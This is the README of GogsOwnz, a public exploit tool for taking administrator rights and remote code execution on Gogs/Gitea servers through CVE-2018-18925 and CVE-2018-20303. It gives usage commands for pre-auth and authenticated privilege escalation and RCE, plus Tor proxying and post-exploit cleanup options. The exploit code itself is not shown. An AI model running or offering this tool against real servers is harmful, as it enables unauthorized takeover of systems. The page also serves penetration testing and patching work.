Gogs CVEs
TheZ3ro Merge pull request #2 from pollev/patch-1
Properly preserve session ID length
Latest commit b634b5f Jul 29, 2019


GogsOwnz is a simple script to gain administrator rights and RCE on a Gogs/Gitea server.
It exploits vulnerabilities in Gogs/Gitea, including CVE-2018-18925 and CVE-2018-20303.

Legal Disclaimer

This script is offered as is, with no warranty. Use it at your own risk, and please obey the law.

Typical Usage - [Please, read the full usage]

Get info about Gogs/Gitea running

python3 -v --info

Exploit preauth PrivEsc

python3 -v --preauth

Exploit PrivEsc

python3 -v -C '<user>:<password>' --cleanup

or alternatively

python3 -v -c '<i_like_gogs_cookie>' --cleanup

Exploit preauth RCE

python3 -v --preauth --rce 'sleep 10' --cleanup

Exploit auth RCE

python3 -v -C '<user>:<password>' --rce 'sleep 10' --cleanup

Full usage

usage: gogsownz [-h] [-C CREDS] [-n COOKIENAME] [-c COOKIE] [-i] [--rce RCE]
                [--repo REPO] [--preauth] [--windows] [--cleanup] [--tor]
                [--check-tor] [--burp] [-k] [--verbose]

positional arguments:
  url                   URL for the Gogs server

optional arguments:
  -h, --help            show this help message and exit
  -C CREDS, --creds CREDS
                        Credentials for the Gogs server, in the from
  -n COOKIENAME, --cookie-name COOKIENAME
                        Name of the Gogs-specific session cookie
  -c COOKIE, --cookie COOKIE
                        Session for the Gogs server, the value in the
                        i_like_gogits Cookie
  -i, --info            Only detect informations about the running Gogs
                        server, then quit
  --rce RCE             Command to execute on the Gogs server
  --repo REPO           Use an existing repo for the PrivEsc
  --preauth             Try the pre-auth vulnerability
  --windows             Gogs server runs on Windows
  --cleanup             Remove all created repo after exploit
  --tor                 Use tor proxy when performing requests
  --check-tor           Check that Tor is correctly set up before running
  --burp                Use burp proxy when performing requests
  -k, --insecure        Allow insecure server connections when using SSL
  --verbose, -v


Thanks to:

  • Tencent Security (@md5_salt, @ma7h1as and @chromium1337)
  • PentesterLab (@snyff)
  • LuckyC4t
  • the gogs security community :D

Further readings
